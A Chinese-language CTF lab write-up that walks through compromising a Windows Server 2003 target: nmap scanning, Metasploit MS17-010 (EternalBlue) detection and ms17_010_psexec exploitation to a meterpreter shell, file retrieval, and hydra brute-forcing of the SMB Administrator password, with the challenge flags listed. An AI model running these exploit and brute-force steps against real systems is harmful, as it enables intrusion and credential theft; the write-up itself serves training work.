记一次某竞赛中的渗透测试(Windows Server 2003靶机漏洞)

在这里插入图片描述

靶机简介

Windows Server 2003是微软公司于2003年3月28日发布的服务器操作系统,它基于Windows XP/Windows NT 5.1进行开发,并在同年4月底上市。以下是关于Windows Server 2003的详细介绍:

  1. 系统名称与发布历程:
  • 该产品最初被命名为“Windows .NET Server”,之后更名为“Windows .NET Server 2003”,最终定名为“Windows Server 2003”。
  1. 主要功能与特点:
  • “Windows Driver Protection”功能:此功能可以防止安装被指出存在故障的驱动程序,并提示用户购买升级版本。
  • “Driver Rollback”功能:当因存在缺陷的驱动程序而产生错误时,此功能可以更迅速地修复Windows Server 2003。
  • 日志记录功能:只要用户打开日志记录,就能查看谁在访问什么内容,这有助于偶尔检查日志以发现是否有入侵迹象。
  • 备份与恢复:如果出现某种软件或硬件故障,用户之前手动进行的备份可以被恢复。
  1. 改进之处:
  • 相对于Windows 2000,Windows Server 2003在多个方面进行了改进,如改进的Active Directory(活动目录)、Group Policy(组策略)操作和管理、磁盘管理等。
  • 特别是在脚本和命令行工具方面的改进,对微软来说是一次革新,因为它将一个完整的命令外壳带入了下一个版本的Windows。
  1. 安全性与支持:
  • Windows Server 2003的支持在2015年7月14日结束,此后其安全性不再获得保障。运行Windows Server 2003的所有数据中心在2015年7月14日之后将无法获得官方发布的更新和修补程序,也无法满足合规性要求。
  • 然而,值得注意的是,在2017年5月,针对**“永恒之蓝”病毒**,微软向该系统推送了补丁。

总的来说,Windows Server 2003是微软推出的一款广泛使用的服务器操作系统,它提供了一系列的功能和改进,但在其生命周期的后期,微软结束了对它的官方支持。

准备工作

攻击机:Kali
靶机:Windows Server 2003

任务说明

任务编号任务描述答案格式:flag{xxx}分值
任务一请提交靶机445端口对应的服务状态信息flag{open}20
任务二请提交靶机首选DNS服务器地址flag{192.168.229.2}20
任务三请提交靶机桌面上111文件夹文档内容flag{s4f4s4d4fs45f4s61s31fs4f654s}20
任务四请提交靶机回收站中文档的内容flag{s4f4s4d4fs45f4s61s31fs4f654s}20
任务五请提交靶机管理员账号密码flag{Admin123456…}20

渗透过程

任务一

Nmap扫描端口信息

nmap扫描靶机IP地址及端口开启状态

1、ifconfig查看攻击机Kali的IP地址
2、nmap扫描此IP网段的存活IP以及端口开启状态
*注意:攻击机和靶机均保持启动状态   网络适配器模式均为NAT模式

image.png

flag

任务一:flag{open}

任务二

启动msf攻击框架

查看msfdb数据库状态
service postgresql status

开启msfdb数据库
service postgresql start

初始化msfdb数据库
msfdb init

msfdb数据库已开启
service postgresql status

image.png

进入msf攻击框架

msfconsole

查看是否成功进入msf攻击框架
db_status

image.png

探测是否存在漏洞

查看ms17_010漏洞所有模块
search ms17_010

image.png

选择利用模块
use auxiliary/scanner/smb/smb_ms17_010

image.png

设置被攻击IP
set rhost 192.168.229.132

image.png

设置攻击线程
set threads 20

image.png

探测
run

image.png

出现likely表示存在漏洞

利用模块进行攻击

1.利用攻击模块
use exploit/windows/smb/ms17_010_psexec
2.设置被攻击IP
set rhost 192.168.229.132
3.设置攻击端口
set rport 445
4.设置监听IP
set lhost 192.168.229.129
5.设置监听端口
set lport 6666
6.进行攻击
run
*注意:出现meterpreter表示攻击成功!

image.png

进入靶机终端
shell

查看首选DNS服务器地址
ipconfig/all

image.png

flag

任务二:flag{192.168.229.2}

任务三

进入靶机桌面目录

退出靶机终端
考虑到进入靶机终端乱码问题,所以选择退出靶机终端,在msf中进行操作
exit

image.png

进入靶机C盘目录
cd C:/

image.png

进入桌面目录
*注意:命令和目录都可以补全

image.png

将111文件下载到攻击机
download 111

image.png

查看111文件内容

image.png

flag

任务三:flag{s4f4s4d4fs45f4s61s31fs4f654s}

任务四

进入靶机回收站目录

image.png

将回收站中的文件下载到攻击机

image.png

查看文件内容

*注意:此文件夹中有多个文件,题目要求是查看文档内容,那么就是doc文档

image.png

flag

**任务四:flag{s4f4s4d4fs45f4s61s31fs4f654s} **

任务五

指定用户名选择密码字典进行爆破

什么是SMB协议?
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

hydra -l Administrator -P password.txt smb://192.168.229.132 -vV
-l 指定破解的用户 对特定用户破解
-P 指定密码字典
smb协议
-vV 显示详细过程
通过smb协议对Administrator用户进行密码爆破,并显示爆破的详细过程

image.png
image.png

登录靶机成功

image.png
image.png
image.pngimage.png
image.png

flag

任务五:flag{Admin123456…}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/363020.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

linux vim 异常退出 异常处理 交换文件

交换文件 *.swp 格式 同时是隐藏的 如在vim一个文件, 在没有正常退出, 如直接断开连接 在次编辑这个文件 会出现下图的错误 解决方案: 直接删除这个交换文件即可 rm -fr .zen.txt.swp

经典左旋,指针面试题

今天给大家带来几道面试题! 实现一个函数,可以左旋字符串中的k个字符。 例如: ABCD左旋一个字符得到BCDA ABCD左旋两个字符得到CDAB 我们可以先自己自行思考,下面是参考答案: 方法一: #define _CRT_SEC…

人工智能网络安全挑战赛(AIxCC):超亿元大奖等你来拿!

2023年底,DARPA开启了一项前所未有的挑战——人工智能网络安全挑战赛(AIxCC),旨在通过技术竞赛探索AI时代下网络安全的新格局。该赛事希望孕育出一种创新的网络安全通用人工智能(AGI)系统,该系统…

从0到1入门C++编程——06 类和对象之多态、文件操作

文章目录 多态1.多态基本概念2.多态案例——计算器3.纯虚函数和抽象类4.多态案例——制作饮品5.虚析构和纯虚析构6.多态案例——电脑组装 文件操作1.文本文件--写文件2.文本文件--读文件3.二进制文件--写文件4.二进制文件--读文件 多态 1.多态基本概念 多态是C面向对象的三大…

阿里云 DMS 执行sql变更

数据库开发-数据变更-无锁变更 选择数据库:比如要更新生产库,搜索生产库名字。 填入变更sql。

实现两栏布局和三栏布局的多种详细方法

目录 一、背景两栏布局三栏布局 二、两栏布局flex弹性布局 三、三栏布局两边使用 float,中间使用 margin两边使用 absolute,中间使用 margin两边使用 float 和负 margin使用 display: table 实现使用flex实现grid网格布局 参考文献 一、背景 在日常布局…

AI大模型专题:大模型赋能座舱,智能座舱新战场

今天分享的是AI大模型系列深度研究报告:《AI大模型专题:大模型赋能座舱,智能座舱新战场》。 (报告出品方:国泰君安证券) 报告共计:19页 大模型技术将给予智能座舱一次深度进化 拥抱大模型技术…

vue 打包下载多层zip文件

npm install jszip npm install file-saverimport JSZip from "jszip"; import FileSaver from "file-saver"; import {Message} from "view-design";/*** 下载文件 传数组* fileList* [* {* type:file,* name:17034953113790548.png,…

ubuntu22.04@laptop安装配置VNC服务端

ubuntu22.04laptop安装&配置VNC服务端 1. 源由2. 系统安装3. VNC安装3.1 系统更新3.2 lightdm安装3.3 x11vnc安装3.4 x11vnc配置3.5 x11vnc自启动3.6 x11vnc状态查询 4. 演示视频5. 附录 - “Failed to start x11vnc service.” 1. 源由 最近系统搞TensorFlow, OpenCV, Py…

免费的ppt网站分享

前言 相信大学生们深有体会,对于学校而言,好像是任何活动都需要我们做ppt,当你拿着自己辛苦做的ppt去展示现场的时候,你看到别人的ppt比你的还好,此时心情就是毙,当你知道人家不过是仅仅的1个小时不到就完成…

本地搭建Plex私人影音网站并结合内网穿透实现公网远程访问

💝💝💝欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…

【数据库数据恢复】Oracle数据库ASM磁盘组数据恢复案例

oracle数据库故障&分析: oracle数据库ASM磁盘组掉线,ASM实例不能挂载。数据库管理员尝试修复数据库,但是没有成功。 oracle数据库数据恢复过程: 1、将oracle数据库所涉及磁盘以只读方式备份。后续的数据分析和数据恢复操作都…

QT中QComboBox添加点击事件,实现下拉框自动刷新

因为项目需要,在QT中的ui界面添加QComboBox控件,需求是实现控件的点击事件,查了资料,发现这个控件类的本身是没有点击信号可以使用的。 但是QT是基于C的面向对象,有了这个特点,我们就可以继承原来的类&…

QSS样式表简单梳理记录

1.带namespace的类,样式表写法: // 命令空间LW,类名Demo LW--Demo {background-color: rgba(0, 0, 0, 0.5); } 2.带状态的类,样式表写法: // 类名Demo,状态current Demo[current"true"] {back…

Java基础 集合(二)List详解

目录 简介 数组与集合的区别如下: 介绍 AbstractList 和 AbstractSequentialList Vector 替代方案 Stack ArrayList LinkedList 前言-与正文无关 生活远不止眼前的苦劳与奔波,它还充满了无数值得我们去体验和珍惜的美好事物。在这个快节奏的世界…

Redis 布隆过滤器

布隆过滤器 这一篇文章主要是记录布隆过滤器的使用和认识 主要参考了如下的blog https://blog.csdn.net/weixin_42972832/article/details/131211665 他讲的还不错 简单的来说,布隆过滤器,实际上就像是一个集合,拿redis的key来举例来说,布隆过滤器的设置就是去过滤不属于redi…

static 成员函数

在书上看到这样一段话 ”在引入static 成员函数之前,C语言要求所有的成员函数都必须经由该 class 的对象来调用。而实际上,只有当一个或多个 nonstatic 数据成员在成员函数中被直接存取时,才需要 class 的对象。class 对象提供了 this 指针来…

C#版字节跳动SDK - SKIT.FlurlHttpClient.ByteDance

前言 在我们日常开发工作中对接第三方开放平台,找一款封装完善且全面的SDK能够大大的简化我们的开发难度和提高工作效率。今天给大家推荐一款C#开源、功能完善的字节跳动SDK:SKIT.FlurlHttpClient.ByteDance。 项目官方介绍 可能是全网唯一的 C# 版字…

C语言简介

Visual Studio编辑器左侧菜单栏不小心关掉如何打开(左侧解决方案资源管理器不显示如何打开)、C语言中int main和void main的区别以及C工程的创建_visual studio2022 资源管理器怎么打开桌面面板-CSDN博客 目录 ​编辑 1. 简介 2. 介绍 3. C程序 …

保姆式挑选钢化膜教程,不看真的后悔

覆盖率 我们怎样挑选钢化膜呢?选手机膜最重要的是看它的覆盖率,所谓覆盖就是手机膜覆盖住你的手机屏幕,一般覆盖率达到 97% 左右,几乎就感受不到膜的存在。 很多朋友应该听说过 2D 钢化膜,它是没有经过边缘抛光处理的…